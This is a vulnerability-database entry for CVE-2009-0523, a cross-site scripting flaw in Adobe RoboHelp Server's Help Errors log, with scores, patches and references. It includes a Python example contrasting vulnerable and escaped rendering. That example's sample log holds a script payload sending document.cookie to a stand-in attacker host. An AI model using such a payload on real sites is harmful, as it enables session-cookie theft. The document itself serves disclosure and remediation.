ID

VAR-200902-0563


CVE

CVE-2009-0523


TITLE

Adobe RoboHelp Server Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2009-001101

DESCRIPTION

Cross-site scripting (XSS) vulnerability in Adobe RoboHelp Server 6 and 7 allows remote attackers to inject arbitrary web script or HTML via a crafted URL, which is not properly handled when displaying the Help Errors log.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Adobe RoboHelp Server 6 and 7 are vulnerable.

TITLE: Adobe RoboHelp Server Cross-Site Scripting Vulnerabilities

SECUNIA ADVISORY ID: SA34048

VERIFY ADVISORY: http://secunia.com/advisories/34048/

DESCRIPTION: Some vulnerabilities have been reported in Adobe RoboHelp Server, which can be exploited by malicious people to conduct cross-site scripting attacks.

1) Certain unspecified input is not properly sanitised before being returned to the user. Successful exploitation requires that the attacker has access to the RoboHelp Help Errors log or is able to trick a victim possessing the required permissions into following a malicious URL.

2) Input passed to unspecified parameters is not properly sanitised before being returned to the user.

SOLUTION: Apply patches and regenerate the RoboHelp content. See vendor's advisory for additional details.

PROVIDED AND/OR DISCOVERED BY:
1) The vendor credits Greg Patton, PropertyInfo Corporation
2) The vendor credits Robert Fly, SalesForce.com

ORIGINAL ADVISORY: Adobe APSB09-02: http://www.adobe.com/support/security/bulletins/apsb09-02.html

Trust: 1.98

sources: NVD: CVE-2009-0523 // JVNDB: JVNDB-2009-001101 // BID: 33887 // PACKETSTORM: 75199
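The description above is all the page says about the mechanism: a value taken from a crafted request URL ends up in the Help Errors log and is later written into the log page without output encoding, so whoever opens that report runs the attacker's script. The Python below is an added illustration, not RoboHelp Server code: the log layout, the field names, the function names and the sample entries are all constructed here. It puts the unencoded renderer next to the encoded one so the difference can be checked on a crafted path.

```python
import html

# Constructed sample "help errors" entries (timestamp, requested path, error);
# these are not real RoboHelp log lines. The second path carries a reflected
# XSS payload of the kind the advisory describes: it is logged as the request
# for a missing topic and shown back to an administrator.
SAMPLE_LOG = [
    ("2009-02-24 10:01:13", "/robohelp/topics/install.htm", "topic not found"),
    ("2009-02-24 10:02:40",
     '/robohelp/topics/<script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
     "topic not found"),
]


def render_errors_vulnerable(entries):
    """Log viewer as the unpatched behaviour is described: the requested path
    is concatenated straight into the markup, so a <script> tag embedded in a
    request URL is executed in the browser of the user viewing the report."""
    rows = "".join(
        f"<tr><td>{ts}</td><td>{path}</td><td>{msg}</td></tr>"
        for ts, path, msg in entries
    )
    return f"<table>{rows}</table>"


def render_errors_fixed(entries):
    """Same report with every attacker-influenced field HTML-encoded for the
    element-content context it lands in. quote=True also escapes quotes, so
    the helper stays safe if a field is later moved into an attribute."""
    rows = "".join(
        "<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
            html.escape(ts, quote=True),
            html.escape(path, quote=True),
            html.escape(msg, quote=True),
        )
        for ts, path, msg in entries
    )
    return f"<table>{rows}</table>"


def contains_live_script(markup):
    """Coarse check used when comparing the two renderers: True if a literal
    <script> tag survived into the output."""
    return "<script>" in markup.lower()


if __name__ == "__main__":
    print("vulnerable executes payload:", contains_live_script(render_errors_vulnerable(SAMPLE_LOG)))
    print("fixed executes payload:     ", contains_live_script(render_errors_fixed(SAMPLE_LOG)))
```

Encoding belongs at the point where the log is rendered, not where it is written: the same log line may be shown in HTML, in a plain-text export and in an e-mail, and each sink needs its own encoding. A Content-Security-Policy on the admin pages limits what an injected script can do if a sink is missed, but it does not replace output encoding.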

AFFECTED PRODUCTS

vendor: adobe  model: robohelp server  scope: eq  version: 7

Trust: 2.7

vendor: adobe  model: robohelp server  scope: eq  version: 6

Trust: 2.7

vendor: adobe  model: robohelp  scope: eq  version: 7

Trust: 1.6

vendor: adobe  model: robohelp  scope: eq  version: 6

Trust: 1.6

vendor: hitachi  model: device manager  scope: eq  version: software

Trust: 0.8

vendor: hitachi  model: it operations director  scope: -  version: -

Trust: 0.8

vendor: hitachi  model: replication manager  scope: eq  version: software

Trust: 0.8

vendor: hitachi  model: tiered storage manager  scope: eq  version: software

Trust: 0.8

vendor: hitachi  model: jp1/it desktop management  scope: eq  version: - manager

Trust: 0.8

sources: BID: 33887 // JVNDB: JVNDB-2009-001101 // CNNVD: CNNVD-200902-604 // NVD: CVE-2009-0523

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2009-0523
value: MEDIUM

Trust: 1.0

NVD: CVE-2009-0523
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-200902-604
value: MEDIUM

Trust: 0.6

nvd@nist.gov: CVE-2009-0523
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

sources: JVNDB: JVNDB-2009-001101 // CNNVD: CNNVD-200902-604 // NVD: CVE-2009-0523

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.8

sources: JVNDB: JVNDB-2009-001101 // NVD: CVE-2009-0523

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-200902-604

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 75199 // CNNVD: CNNVD-200902-604

CONFIGURATIONS

sources: JVNDB: JVNDB-2009-001101

PATCH

title: APSB09-02  url: http://www.adobe.com/support/security/bulletins/apsb09-02.html

Trust: 0.8

title: APSB09-02  url: http://www.adobe.com/jp/support/security/bulletins/apsb09-02.html

Trust: 0.8

title: HS12-011  url: http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS12-011/index.html

Trust: 0.8

title: HS12-014  url: http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS12-014/index.html

Trust: 0.8

title: HS12-017  url: http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS12-017/index.html

Trust: 0.8

title: HS12-014  url: http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-014/index.html

Trust: 0.8

title: HS12-017  url: http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-017/index.html

Trust: 0.8

title: HS12-011  url: http://www.hitachi.co.jp/Prod/comp/soft1/security/info/vuls/HS12-011/index.html

Trust: 0.8

sources: JVNDB: JVNDB-2009-001101

EXTERNAL IDS

db: NVD  id: CVE-2009-0523

Trust: 2.7

db: BID  id: 33887

Trust: 2.7

db: SECUNIA  id: 34048

Trust: 2.5

db: VUPEN  id: ADV-2009-0512

Trust: 2.4

db: SECTRACK  id: 1021755

Trust: 2.4

db: XF  id: 48890

Trust: 1.4

db: JVNDB  id: JVNDB-2009-001101

Trust: 0.8

db: CNNVD  id: CNNVD-200902-604

Trust: 0.6

db: PACKETSTORM  id: 75199

Trust: 0.1

sources: BID: 33887 // JVNDB: JVNDB-2009-001101 // PACKETSTORM: 75199 // CNNVD: CNNVD-200902-604 // NVD: CVE-2009-0523

REFERENCES

url:http://secunia.com/advisories/34048

Trust: 2.4

url:http://www.securityfocus.com/bid/33887

Trust: 2.4

url:http://securitytracker.com/id?1021755

Trust: 2.4

url:http://www.vupen.com/english/advisories/2009/0512

Trust: 2.4

url:http://www.adobe.com/support/security/bulletins/apsb09-02.html

Trust: 2.0

url:http://xforce.iss.net/xforce/xfdb/48890

Trust: 1.4

url:https://exchange.xforce.ibmcloud.com/vulnerabilities/48890

Trust: 1.0

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-0523

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-0523

Trust: 0.8

url:http://www.adobe.com/products/robohelpserver/

Trust: 0.3

url:http://secunia.com/advisories/secunia_security_advisories/

Trust: 0.1

url:http://secunia.com/advisories/business_solutions/

Trust: 0.1

url:http://secunia.com/advisories/try_vi/

Trust: 0.1

url:http://secunia.com/advisories/34048/

Trust: 0.1

url:http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

Trust: 0.1

url:http://secunia.com/advisories/about_secunia_advisories/

Trust: 0.1

sources: BID: 33887 // JVNDB: JVNDB-2009-001101 // PACKETSTORM: 75199 // CNNVD: CNNVD-200902-604 // NVD: CVE-2009-0523

CREDITS

Greg Patton

Trust: 0.6

sources: CNNVD: CNNVD-200902-604

SOURCES

db: BID  id: 33887
db: JVNDB  id: JVNDB-2009-001101
db: PACKETSTORM  id: 75199
db: CNNVD  id: CNNVD-200902-604
db: NVD  id: CVE-2009-0523

LAST UPDATE DATE

2024-11-23T22:23:50.995000+00:00


SOURCES UPDATE DATE

db: BID  id: 33887  date: 2009-02-24T23:17:00
db: JVNDB  id: JVNDB-2009-001101  date: 2012-06-27T00:00:00
db: CNNVD  id: CNNVD-200902-604  date: 2009-02-27T00:00:00
db: NVD  id: CVE-2009-0523  date: 2024-11-21T01:00:09.167

SOURCES RELEASE DATE

db: BID  id: 33887  date: 2009-02-24T00:00:00
db: JVNDB  id: JVNDB-2009-001101  date: 2009-03-27T00:00:00
db: PACKETSTORM  id: 75199  date: 2009-02-25T15:46:37
db: CNNVD  id: CNNVD-200902-604  date: 2009-02-26T00:00:00
db: NVD  id: CVE-2009-0523  date: 2009-02-26T16:17:19.967